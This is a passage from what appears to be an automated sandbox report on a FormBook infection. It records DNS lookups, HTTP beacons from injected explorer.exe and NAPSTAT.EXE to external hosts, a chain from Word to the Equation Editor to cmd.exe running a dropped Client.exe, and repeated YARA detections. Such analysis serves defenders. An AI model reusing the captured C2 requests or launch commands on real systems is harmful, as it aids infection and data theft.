                                                  Aug 8, 2022 12:08:49.348788977 CEST8.8.8.8192.168.2.220xceeeNo error (0)www.magadirect.co.uk45.79.19.196A (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST8.8.8.8192.168.2.220xceeeNo error (0)www.magadirect.co.uk45.56.79.23A (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST8.8.8.8192.168.2.220xceeeNo error (0)www.magadirect.co.uk96.126.123.244A (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST8.8.8.8192.168.2.220xceeeNo error (0)www.magadirect.co.uk72.14.178.174A (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST8.8.8.8192.168.2.220xceeeNo error (0)www.magadirect.co.uk198.58.118.167A (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST8.8.8.8192.168.2.220xceeeNo error (0)www.magadirect.co.uk173.255.194.134A (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST8.8.8.8192.168.2.220xceeeNo error (0)www.magadirect.co.uk45.33.23.183A (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST8.8.8.8192.168.2.220xceeeNo error (0)www.magadirect.co.uk45.33.2.79A (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:09:09.386590958 CEST8.8.8.8192.168.2.220xca44No error (0)www.sqlite.org45.33.6.223A (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:09:09.754498959 CEST8.8.8.8192.168.2.220xc4a9Name error (3)www.luanaterra.onlinenonenoneA (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:09:14.786825895 CEST8.8.8.8192.168.2.220xca6dNo error (0)www.hogogala.com162.213.253.236A (IP address)IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • www.magadirect.co.uk
                                                  • www.sqlite.org

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.224917145.33.18.4480C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Aug 8, 2022 12:08:49.539773941 CEST1OUTGET /aekc/?p6A=k0tTOTrAn50YQe1h4ozxDNX4wd5+O6pkKrWAMwmyhhYwJBfC5YpDY/r3FGLgLX7DF3fRHoVtyXQnCSOz0Ea/6qte5rYurCT1UmXBzRE=&xjRt=ZvcPNdzxaTTX6DM HTTP/1.1
                                                  Host: www.magadirect.co.uk
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Aug 8, 2022 12:08:49.683424950 CEST1INHTTP/1.1 404 Not Found
                                                  server: openresty/1.13.6.1
                                                  date: Mon, 08 Aug 2022 10:08:49 GMT
                                                  content-type: text/html
                                                  content-length: 175
                                                  connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  1192.168.2.224917245.33.6.22380C:\Windows\SysWOW64\NAPSTAT.EXE
                                                  TimestampkBytes transferredDirectionData
                                                  Aug 8, 2022 12:09:09.556029081 CEST2OUTGET /2014/sqlite-dll-win32-x86-3080700.zip HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: www.sqlite.org
                                                  Connection: Keep-Alive
                                                  Aug 8, 2022 12:09:09.698842049 CEST3INHTTP/1.1 404 Not Found
                                                  Connection: close
                                                  Date: Mon, 08 Aug 2022 10:09:09 GMT
                                                  Content-type: text/html; charset=utf-8
                                                  Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 20 6c 69 6e 65 6e 6f 3d 22 33 39 30 22 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 6f 63 75 6d 65 6e 74 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 2f 32 30 31 34 2f 73 71 6c 69 74 65 2d 64 6c 6c 2d 77 69 6e 33 32 2d 78 38 36 2d 33 30 38 30 37 30 30 2e 7a 69 70 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 0a 3c 2f 62 6f 64 79 3e 0a
                                                  Data Ascii: <head><title lineno="390">Not Found</title></head><body><h1>Document Not Found</h1>The document /2014/sqlite-dll-win32-x86-3080700.zip is not available on this server</body>


                                                  Statistics

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:12:07:13
                                                  Start date:08/08/2022
                                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                  Imagebase:0x13f9e0000
                                                  File size:1423704 bytes
                                                  MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:2
                                                  Start time:12:07:15
                                                  Start date:08/08/2022
                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                  Imagebase:0x400000
                                                  File size:543304 bytes
                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:3
                                                  Start time:12:07:16
                                                  Start date:08/08/2022
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:CmD.exe /C %tmp%\Client.exe A C
                                                  Imagebase:0x4a690000
                                                  File size:302592 bytes
                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:5
                                                  Start time:12:07:16
                                                  Start date:08/08/2022
                                                  Path:C:\Users\user\AppData\Local\Temp\Client.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\Client.exe A C
                                                  Imagebase:0x1180000
                                                  File size:948736 bytes
                                                  MD5 hash:D94161753531177B2FB80365ADDCBFA8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 22%, ReversingLabs
                                                  Reputation:low

                                                  General

                                                  Target ID:9
                                                  Start time:12:07:32
                                                  Start date:08/08/2022
                                                  Path:C:\Windows\SysWOW64\notepad.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\notepad.exe /Processid:{9A42BBC4-4F4B-4518-841E-56E3DAA7341B}
                                                  Imagebase:0x570000
                                                  File size:179712 bytes
                                                  MD5 hash:A4F6DF0E33E644E802C8798ED94D80EA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:moderate

                                                  General

                                                  Target ID:10
                                                  Start time:12:07:39
                                                  Start date:08/08/2022
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Explorer.EXE
                                                  Imagebase:0xff040000
                                                  File size:3229696 bytes
                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high

                                                  General

                                                  Target ID:11
                                                  Start time:12:08:19
                                                  Start date:08/08/2022
                                                  Path:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                  Imagebase:0xa00000
                                                  File size:279552 bytes
                                                  MD5 hash:4AF92E1821D96E4178732FC04D8FD69C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:moderate

                                                  General

                                                  Target ID:13
                                                  Start time:12:09:10
                                                  Start date:08/08/2022
                                                  Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Program Files (x86)\Mozilla Firefox\Firefox.exe
                                                  Imagebase:0x190000
                                                  File size:517064 bytes
                                                  MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:moderate

                                                  Disassembly

                                                  No disassembly